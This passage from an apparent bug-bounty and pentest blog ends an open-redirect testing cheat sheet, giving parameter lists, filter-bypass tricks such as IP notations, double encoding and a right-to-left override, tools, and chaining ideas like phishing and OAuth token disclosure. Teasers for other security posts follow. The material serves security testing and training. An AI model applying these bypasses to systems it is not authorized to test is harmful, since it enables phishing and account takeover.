?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}

How to find entry points to test?

  • Burp Proxy history & Burp Sitemap (look at URLs with parameters)
  • Google dorking. E.g: inurl:redirectUrl=http site:target.com
  • Functionalities usually associated with redirects:
    • Login, Logout, Register & Password reset pages
    • Change site language
    • Links in emails
  • Read JavaScript code
  • Bruteforcing
    • Look for hidden redirect parameters, for e.g.:
    • /redirect?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}
    • /?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}

Responses to look for when fuzzing

Tips

  • Try using the same parameter twice: ?next=whitelisted.com&next=google.com
  • If periods filtered, use an IPv4 address in decimal notation http://www.geektools.com/geektools-cgi/ipconv.cgi
  • Try a double-URL and triple-URL encoded version of payloads
  • Try redirecting to an IP address (instead of a domain) using different notations: IPv6, IPv4 in decimal, hex or octal
  • For XSS, try replacing alert(1) with prompt(1) & confirm(1)
  • If extension checked, try ?image_url={payload}/.jpg
  • Try target.com/?redirect_url=.uk (or [any_param]=.uk). If it redirects to target.com.uk, then it’s vulnerable! target.com.uk and target.com are different domains.
  • Use /U+e280 RIGHT-TO-LEFT OVERRIDE: https://[email protected]%E2%80%[email protected]

Tools

  • Burp Intruder & Burp Repeater
  • open-redirect-scanner
  • Dirsearch with an open redirect payloads list (instead of the default list, or combined)

Exploitation

  • Phishing
  • Chaining open redirect with
    • SSRF
    • OAuth token disclosure
    • XSS
    • CRLF injection

Resources

Open redirect writeups

Let me know if you have any comments, requests, questions… Feedback is always welcome.

See you next time!

 pentest  bug bounty  training  challenge  hacking  pentest resources  cheatsheets  vulnerability

5 things I wish I knew when I started as a junior penetration tester

31 Oct 2018 Tips-n-tricks

Hi, today I’m going to share with you some advice that I wish somebody told me as a beginner penetration tester.

Working on your technical skills is important. But from my experience, mindset and productivity/organizational habits are even more important. They are the basis on which you will build solid technical skills, while maximizing your time and efforts.

The following tips are not exotic or extraodinary. But if you apply them and make them habits, they will help you up your game as a pentester and bug hunter.

5-things-i-wish-i-knew.png

More …

The 5 Hacking NewsLetter 25

29 Oct 2018 newsletter

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.

This issue covers the week from 19 to 26 of October.

T5HN25.png

Our favorite 5 hacking items

1. Conference of the week

Beyond your studies & Slides by Ange Albertini

Wow, this talk is a gem (the slides also)! I wish I’d seen it as a teenager. It puts a light on so many truths related to infosec, job search, corporate environments, studies, the mold society tries to put you in, etc.

Watch it, even if you’re not a student or that young. If applied, this is life-changing advice.

More …

Source code disclosure via exposed .git folder

25 Oct 2018 Tutorials

Hi, I recently found a .git folder exposed on a public bug bounty program and used it to reconstruct the Web app’s source code. I can’t disclose specific details yet, but wanted to share with you this tutorial on how to find and exploit this kind of bugs.

exposed-git-folder.png

.git exposure can pay well or not, depending on the assets found. But it is interesting anyway because:

  1. It is very easy to detect
  2. Analyzing the source code can reveal other vulnerabilities that are even more critical and interesting
More …

5 tips to make the most of Twitter as a pentester or bug bounty hunter

23 Oct 2018 Tips-n-tricks

twitter-tips.png

Hi, if you ask any experienced bug hunter or pentester, they’ll tell you that Twitter is one of their main sources of information & learning resources.

But keeping up with all the tweets, tips, tools and links shared there is not an easy task. It requires a bit of organization.

The following 5 features combined together will help you stay up to date without feeling overwhelmed. They’ll also end your search for old tweets and the need to scroll your bookmarks endlessly to find something saved before.

More …